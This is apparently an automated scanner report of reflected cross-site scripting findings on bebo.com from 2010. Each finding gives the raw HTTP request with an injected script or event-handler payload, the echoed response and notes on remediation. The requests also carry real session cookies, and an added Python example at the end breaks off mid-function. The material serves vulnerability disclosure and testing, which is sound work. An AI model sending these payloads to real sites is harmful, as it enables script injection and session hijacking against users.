Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: nl-NL
Content-Type: text/html; charset=UTF-8
Content-Length: 8805
Date: Mon, 15 Nov 2010 22:43:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44270'%3b5bef3a2aedc was submitted in the REST URL parameter 1. This input was echoed as 44270';5bef3a2aedc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /InviteJoin.jsp44270'%3b5bef3a2aedc HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: nl-NL
Content-Type: text/html; charset=UTF-8
Content-Length: 8553
Date: Mon, 15 Nov 2010 22:43:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a9de3<img%20src%3da%20onerror%3dalert(1)>b096167d7de was submitted in the REST URL parameter 1. This input was echoed as a9de3<img src=a onerror=alert(1)>b096167d7de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /InviteJoin.jspa9de3<img%20src%3da%20onerror%3dalert(1)>b096167d7de HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: nl-NL
Content-Type: text/html; charset=UTF-8
Content-Length: 8787
Date: Mon, 15 Nov 2010 22:43:33 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2f3d3<script>alert(1)</script>1e253450b59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Profile.jsp2f3d3<script>alert(1)</script>1e253450b59 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10727
Date: Mon, 15 Nov 2010 22:43:47 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/profile2f3d3<script>alert(1)</script>1e253450b59 page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9bd0'><script>alert(1)</script>6f49b9cb5c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Profile.jspc9bd0'><script>alert(1)</script>6f49b9cb5c0 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: pl-PL
Content-Type: text/html; charset=UTF-8
Content-Length: 9043
Date: Mon, 15 Nov 2010 22:43:46 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99464'%3bb32a164464a was submitted in the REST URL parameter 1. This input was echoed as 99464';b32a164464a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Profile.jsp99464'%3bb32a164464a HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: pl-PL
Content-Type: text/html; charset=UTF-8
Content-Length: 8818
Date: Mon, 15 Nov 2010 22:43:47 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c91e"><img%20src%3da%20onerror%3dalert(1)>93ab9987253 was submitted in the REST URL parameter 1. This input was echoed as 3c91e"><img src=a onerror=alert(1)>93ab9987253 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Profile.jsp3c91e"><img%20src%3da%20onerror%3dalert(1)>93ab9987253 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: es-ES
Content-Type: text/html; charset=UTF-8
Content-Length: 9184
Date: Mon, 15 Nov 2010 22:43:46 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f10c"><img%20src%3da%20onerror%3dalert(1)>2c267759fd3 was submitted in the Page parameter. This input was echoed as 5f10c"><img src=a onerror=alert(1)>2c267759fd3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /SwitchLanguage.jsp?Page=c/site/index5f10c"><img%20src%3da%20onerror%3dalert(1)>2c267759fd3&QueryString=&Lang=nl HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: nl-NL
Content-Type: text/html; charset=UTF-8
Content-Length: 8711
Date: Mon, 15 Nov 2010 22:43:31 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Page request parameter is copied into the HTML document as plain text between tags. The payload fa7a3<img%20src%3da%20onerror%3dalert(1)>fda7e98343d was submitted in the Page parameter. This input was echoed as fa7a3<img src=a onerror=alert(1)>fda7e98343d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /SwitchLanguage.jsp?Page=c/site/indexfa7a3<img%20src%3da%20onerror%3dalert(1)>fda7e98343d&QueryString=&Lang=nl HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: nl-NL
Content-Type: text/html; charset=UTF-8
Content-Length: 8693
Date: Mon, 15 Nov 2010 22:43:36 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Page request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9483c'style%3d'x%3aexpression(alert(1))'14c655a3c95 was submitted in the Page parameter. This input was echoed as 9483c'style='x:expression(alert(1))'14c655a3c95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /SwitchLanguage.jsp?Page=c/site/index9483c'style%3d'x%3aexpression(alert(1))'14c655a3c95&QueryString=&Lang=nl HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: fr-FR
Content-Type: text/html; charset=UTF-8
Content-Length: 8693
Date: Mon, 15 Nov 2010 22:43:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of the Page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73ab2'%3b5b03293fd4b was submitted in the Page parameter. This input was echoed as 73ab2';5b03293fd4b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /SwitchLanguage.jsp?Page=c/site/index73ab2'%3b5b03293fd4b&QueryString=&Lang=nl HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: es-ES
Content-Type: text/html; charset=UTF-8
Content-Length: 8531
Date: Mon, 15 Nov 2010 22:43:32 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bbb51'><script>alert(1)</script>51b11906c4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/aboutbbb51'><script>alert(1)</script>51b11906c4e HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10727
Date: Mon, 15 Nov 2010 22:43:05 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f1aa'%3beb66ea08b73 was submitted in the REST URL parameter 2. This input was echoed as 3f1aa';eb66ea08b73 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/about3f1aa'%3beb66ea08b73 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10516
Date: Mon, 15 Nov 2010 22:43:05 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e86a"><img%20src%3da%20onerror%3dalert(1)>2945a5ba57f was submitted in the REST URL parameter 2. This input was echoed as 5e86a"><img src=a onerror=alert(1)>2945a5ba57f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/about5e86a"><img%20src%3da%20onerror%3dalert(1)>2945a5ba57f HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10810
Date: Mon, 15 Nov 2010 22:43:04 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7aa4e<script>alert(1)</script>f4eadbae3d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/about7aa4e<script>alert(1)</script>f4eadbae3d7 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10709
Date: Mon, 15 Nov 2010 22:43:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/about7aa4e<script>alert(1)</script>f4eadbae3d7 page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 383ee'><script>alert(1)</script>2c29c2ad8e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/about383ee'><script>alert(1)</script>2c29c2ad8e7/help HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10772
Date: Mon, 15 Nov 2010 22:43:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99129<script>alert(1)</script>0069156af62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/about99129<script>alert(1)</script>0069156af62/help HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found Server: Resin/3.0.24 Cache-Control: no-cache Pragma: No-cache Content-Language: us-US Content-Type: text/html; charset=UTF-8 Content-Length: 10754 Date: Mon, 15 Nov 2010 22:43:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/about99129<script>alert(1)</script>0069156af62/help page, please try again.</div> ...[SNIP]...
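Every finding in this report follows one pattern: a probe of the form random prefix, payload, random suffix is placed in a path segment, and the response is searched for where the probe comes back and whether it came back unmodified. The block below is an added example of that classification step, not the scanner's code and not the application's. The first sample body is the 404 fragment shown above; the attribute and script fragments, and the HTML-encoded variant, are constructed to match what the findings describe, because the report does not show those response bodies. Function names are this example's own.

```python
"""
Locate a reflected probe in an HTML response and name the context it landed
in, using the same vocabulary as the findings. Added example; the attribute,
script and encoded sample bodies are constructed.
"""
import html
import re
from urllib.parse import unquote


def find_reflection(body, prefix, suffix):
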